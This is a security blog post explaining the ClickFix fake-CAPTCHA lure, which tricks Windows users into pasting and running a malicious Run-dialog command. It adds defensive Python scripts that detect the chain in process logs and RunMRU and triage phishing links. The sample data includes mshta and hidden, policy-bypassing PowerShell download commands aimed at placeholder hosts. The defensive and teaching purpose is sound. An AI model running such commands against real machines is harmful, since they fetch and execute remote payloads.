Threatonomics

Understanding the ClickFix attack

by Emma McGowan, Senior Writer

How three keystrokes can lead to malware infection

Imagine a cyberattack so simple yet so deceptive that all it takes is three keystrokes to compromise your system. This is the reality of the ClickFix attack, a threat that Resilience threat researchers have observed in the wild since 2024 and that seems to be ramping up in recent weeks. ClickFix cleverly manipulates users into executing malicious commands under the guise of a routine bot verification test. Originally used in targeted attacks, this technique has rapidly gained traction, posing a significant risk to a broader audience.

At first glance, ClickFix appears harmless—just another “Verify You Are a Human” CAPTCHA-like prompt. However, beneath this familiar facade lies a dangerous trick: users are guided through three seemingly benign keystrokes that ultimately lead to malware installation. 

This attack preys on human behavior, exploiting trust in common online interactions to deploy password-stealing malware (aka infostealers), remote access trojans (RATs), and other malicious payloads. With cybercriminals refining their tactics to maximize efficiency and deception, understanding the mechanics of ClickFix is critical to preventing its spread.

How the ClickFix attack works

ClickFix thrives on social engineering, manipulating users into unwittingly executing malicious commands. This attack preys on human tendencies to solve perceived problems quickly, especially when faced with urgent or authoritative prompts. Because ClickFix requires user interaction, it can often evade automated security solutions that rely on detecting self-executing malware. 

The attack typically begins with a deceptive pop-up on a compromised or malicious website. This pop-up mimics a standard bot verification message, often displaying an “I’m not a robot” checkbox. Upon interaction, users are prompted to complete three simple steps to confirm their identity.

The first step instructs users to press the Windows Key + R simultaneously. This shortcut opens the Run dialog box, a legitimate Windows feature that allows users to execute commands and programs quickly.

Next, users are told to press CTRL + V. This pastes into the Run prompt a malicious command that the website’s script placed on the clipboard when the user interacted with the page. The copy itself is silent, so users may not realize that a harmful command is sitting on their clipboard.

Finally, pressing Enter runs the pasted command, which typically downloads and executes the payload via mshta.exe, a Windows utility designed to run Microsoft HTML Application (HTA) files. This step compromises the device, enabling malware installation.
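The chain described above leaves a recognizable trace: explorer.exe (the process that hosts the Run dialog) spawning mshta.exe or PowerShell with a remote URL, and the pasted text lingering in the user’s RunMRU registry key. The following Python script is an added example and is not part of the Resilience article. It scans process-creation events in a constructed JSON-lines format (field names follow the Sysmon Event ID 1 convention, but the events themselves are made up) and a constructed dump of RunMRU values, and flags commands that match the ClickFix pattern. All hosts and URLs are placeholders under .invalid.

```python
"""Detection logic for the Run-dialog ClickFix chain (added example, not the article's code).

Two inputs are checked:
  1. process-creation events (constructed JSON lines, Sysmon-style field names)
  2. a constructed dump of HKCU\...\Explorer\RunMRU values, which Windows stores
     as "<slot>=<command>\1" (the trailing \1 is how the key records them)
"""
import json
import re
from typing import Iterable

# Windows utilities that ClickFix lures launch from the Run dialog
LOLBINS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe",
           "curl.exe", "bitsadmin.exe", "certutil.exe"}

URL_RE = re.compile(r"https?://", re.I)
ENCODED_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)
HIDDEN_RE = re.compile(r"(?:^|\s)-w(?:indowstyle)?\s+hidden", re.I)
BYPASS_RE = re.compile(r"(?:^|\s)-(?:ep|executionpolicy)\s+bypass", re.I)


def basename(path: str) -> str:
    """Return the file name of a Windows path, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify_command(cmdline: str) -> list[str]:
    """Return the suspicious traits found in a command line (empty list = nothing found)."""
    reasons: list[str] = []
    tokens = cmdline.strip().split()
    if not tokens:
        return reasons
    exe = basename(tokens[0].strip('"'))
    if not exe.endswith(".exe"):
        exe += ".exe"  # the Run dialog accepts "mshta" as well as "mshta.exe"
    if exe not in LOLBINS:
        return reasons
    if URL_RE.search(cmdline):
        reasons.append("remote-url")
    if ENCODED_RE.search(cmdline):
        reasons.append("encoded-command")
    if HIDDEN_RE.search(cmdline):
        reasons.append("hidden-window")
    if BYPASS_RE.search(cmdline):
        reasons.append("execution-policy-bypass")
    return reasons


def scan_process_events(lines: Iterable[str]) -> list[dict]:
    """Flag events where explorer.exe spawns a LOLBin with ClickFix-like arguments."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        if basename(ev.get("ParentImage", "")) != "explorer.exe":
            continue  # not launched from the Run dialog / desktop shell
        reasons = classify_command(ev.get("CommandLine", ""))
        if reasons:
            findings.append({"time": ev.get("UtcTime"), "host": ev.get("Computer"),
                             "image": basename(ev.get("Image", "")),
                             "reasons": reasons, "cmdline": ev["CommandLine"]})
    return findings


RUNMRU_LINE = re.compile(r"^([a-z])=(.*)\\1$")


def scan_run_mru(dump: str) -> list[dict]:
    """Flag RunMRU slots whose stored command looks like a pasted ClickFix payload."""
    findings = []
    for raw in dump.splitlines():
        m = RUNMRU_LINE.match(raw.strip())
        if not m:
            continue  # MRUList ordering line or blank
        slot, cmd = m.groups()
        reasons = classify_command(cmd)
        if reasons:
            findings.append({"slot": slot, "cmdline": cmd, "reasons": reasons})
    return findings


# Constructed sample data; hosts and URLs are placeholders, not real indicators.
SAMPLE_EVENTS = r"""
{"UtcTime": "2025-03-12 10:14:03", "Computer": "WS01", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "mshta https://example.invalid/verify.hta"}
{"UtcTime": "2025-03-12 10:15:40", "Computer": "WS01", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad C:\\Users\\alice\\notes.txt"}
{"UtcTime": "2025-03-12 10:16:12", "Computer": "WS02", "ParentImage": "C:\\Program Files\\Vendor\\agent.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -File C:\\Scripts\\inventory.ps1"}
{"UtcTime": "2025-03-12 10:17:55", "Computer": "WS03", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -w hidden -ep bypass -c \"Invoke-WebRequest https://example.invalid/a\""}
"""

SAMPLE_RUNMRU = r"""
MRUList=cba
a=notepad\1
b=mshta https://example.invalid/verify.hta\1
c=cmd /c echo hello\1
"""

if __name__ == "__main__":
    for f in scan_process_events(SAMPLE_EVENTS.splitlines()):
        print("process:", f["time"], f["host"], f["image"], f["reasons"])
    for f in scan_run_mru(SAMPLE_RUNMRU):
        print("RunMRU slot", f["slot"], f["reasons"], f["cmdline"])
```

The parent-process condition is what separates this from ordinary scripted PowerShell use (the WS02 event above is skipped because a management agent, not the shell, launched it). In an incident, the RunMRU check is a quick way to confirm on a suspect host whether a user actually pasted and ran the lure, since the key keeps the last commands entered into the Run dialog.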

What malware does ClickFix deliver?

ClickFix has been linked to several well-known malware families, including:

  • XWorm
  • Lumma stealer
  • VenomRAT
  • AsyncRAT
  • Danabot
  • NetSupport RAT

The specific payloads vary but commonly include PowerShell scripts, JavaScript, or portable executable (PE) files. These malware variants are often designed to steal financial credentials, log keystrokes, and grant remote attackers full control over an infected device.

Examples of ClickFix in the wild

ClickFix quickly expanded beyond its initial targeted attacks and now affects a range of industries and individuals. Cybercriminals use phishing emails, compromised websites, and social engineering tactics to deploy this attack across different sectors. While any internet user could potentially fall victim to ClickFix, specific industries have been disproportionately targeted due to their reliance on online communications and digital workflows.

Hospitality

A phishing campaign impersonating Booking.com has been leveraging ClickFix to target hospitality organizations. Fraudulent emails reference negative guest reviews, booking requests, or promotional opportunities to lure recipients into clicking malicious links. Microsoft tracks this campaign as Storm-1865, noting that it has been active since at least December 2024.

Healthcare

Cybersecurity firm Arctic Wolf has observed ClickFix attacks targeting healthcare professionals. One notable instance involved malicious code injected into the HEP2go physical therapy video site, redirecting users to ClickFix prompts.

Car dealerships

In March 2025, DarkReading reported on a ClickFix attack targeting car dealerships. More than 100 automotive industry websites were infected via the streaming service provider LES Automotive. It’s the second major attack on an auto industry third-party vendor in less than a year, following the CDK Global takedown last June.

General public

According to the U.S. Department of Health and Human Services, ClickFix has extensive reach and has appeared in many services used by the general public. Variants of this attack have been observed in:

  • Fake Google Chrome error pages
  • Pop-ups spoofing Facebook login pages
  • Impersonations of PDFSimpli and reCAPTCHA
  • Instances invoking PowerShell scripts from remote websites

How to protect yourself (and your organization) against ClickFix

Because ClickFix relies on social engineering, the best defense is employee education. Security training should always include guidance on how to recognize a phishing scheme, reinforced by regular simulated phishing exercises run by your IT team. With that in mind, here are some best practices to defend against phishing:

  • Educate employees on how to recognize phishing scams.
  • Warn employees to be skeptical of unexpected pop-ups requesting key combinations.
  • Encourage checking the sender’s email address carefully before taking action.
  • Advise contacting service providers directly to verify suspicious messages.
  • Caution against responding to emails with urgent calls to action.
  • Instruct employees to hover over links to inspect the full URL before clicking.
  • Teach employees to look for typos and subtle misspellings in emails and URLs.
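Several of the points above (inspect the full URL, check the sender’s domain, watch for subtle misspellings) can also be automated at the mail gateway or in a triage script. The following Python script is an added example and not part of the Resilience article: it pulls every link out of a message body and judges each host against a small allowlist of brand domains, flagging typo-squats, digit-for-letter swaps and the “brand name in the subdomain” trick used by lures like the Booking.com campaign. The brand list and the sample email are constructed, all suspicious hosts use the reserved .invalid TLD, and the eTLD+1 logic is deliberately crude (last two labels), which is enough for the .com brands used here.

```python
"""Link triage for the phishing lures that deliver ClickFix (added example, not the article's code)."""
import re
from urllib.parse import urlparse

# Constructed allowlist of brands worth protecting; a real deployment would load this from config.
BRANDS = {"booking.com", "google.com", "facebook.com", "microsoft.com"}

URL_RE = re.compile(r"""https?://[^\s<>"')]+""", re.I)
# Digits commonly used to impersonate letters in lookalike domains
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t", "8": "b"})


def registrable(host: str) -> str:
    """Crude eTLD+1: the last two labels of the host name."""
    parts = host.lower().strip(".").split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host.lower()


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to catch one- or two-character typo-squats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def judge_host(host: str) -> tuple[str, str]:
    """Return ("legit", brand), ("lookalike", brand) or ("unknown", "")."""
    host = host.lower()
    reg = registrable(host)
    if reg in BRANDS:
        return "legit", reg
    folded = host.translate(HOMOGLYPHS)               # b00king -> booking
    label = registrable(folded).split(".")[0].replace("-", "")
    for brand in sorted(BRANDS):
        name = brand.split(".")[0]
        # brand name anywhere in a non-brand host (subdomain trick, "booking-support"),
        # or the registrable label within two edits of the brand ("bokking")
        if name in folded or edit_distance(label, name) <= 2:
            return "lookalike", brand
    return "unknown", ""


def triage_links(body: str) -> list[dict]:
    """Extract every URL from a message body and attach a verdict to its host."""
    results = []
    for url in URL_RE.findall(body):
        host = urlparse(url).hostname or ""
        verdict, brand = judge_host(host)
        results.append({"url": url, "host": host, "verdict": verdict, "brand": brand})
    return results


# Constructed sample lure in the style of the hospitality campaign described in the article.
SAMPLE_EMAIL = """\
Subject: Urgent: negative guest review requires your response

Dear Partner, a guest left a 1-star review. Review and respond within 24h here:
https://booking.com.partner-review.invalid/verify?id=1842
or via our portal https://admin.booking.com/hotel/reviews
Questions? https://b00king-support.invalid/help
Terms: https://www.example.invalid/terms
"""

if __name__ == "__main__":
    for r in triage_links(SAMPLE_EMAIL):
        print(f"{r['verdict']:<9} {r['host']:<40} {r['brand']}")
```

The substring rule is intentionally aggressive: any non-allowlisted host that contains a protected brand name is reported, which is the right trade-off for a triage queue but would need tuning (or an allowlist of partner domains) before it drives automatic blocking.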

The ClickFix attack is a reminder that cyber threats continue to evolve, finding new ways to bypass traditional security measures. Even seemingly innocuous actions—like pressing a few keys—can lead to real consequences if people are tricked into running malicious code.

Vigilance and skepticism are critical defenses against these attacks. Organizations and individuals must educate themselves on emerging threats, implement strong security protocols, and stay ahead of cybercriminal tactics.
